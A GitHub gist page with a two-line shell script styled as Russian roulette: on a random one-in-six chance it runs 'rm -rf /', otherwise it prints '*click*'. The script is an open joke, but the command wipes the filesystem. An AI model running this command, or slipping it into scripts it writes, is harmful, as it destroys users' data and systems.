Skip to content

Instantly share code, notes, and snippets.

@jake-low
Last active February 1, 2016 18:47
Show Gist options
  • Save jake-low/cbbd51c975b086913c6f to your computer and use it in GitHub Desktop.
Save jake-low/cbbd51c975b086913c6f to your computer and use it in GitHub Desktop.
#!/bin/sh
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo "*click*"
@dmtucker
Copy link

dmtucker commented Feb 1, 2016

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment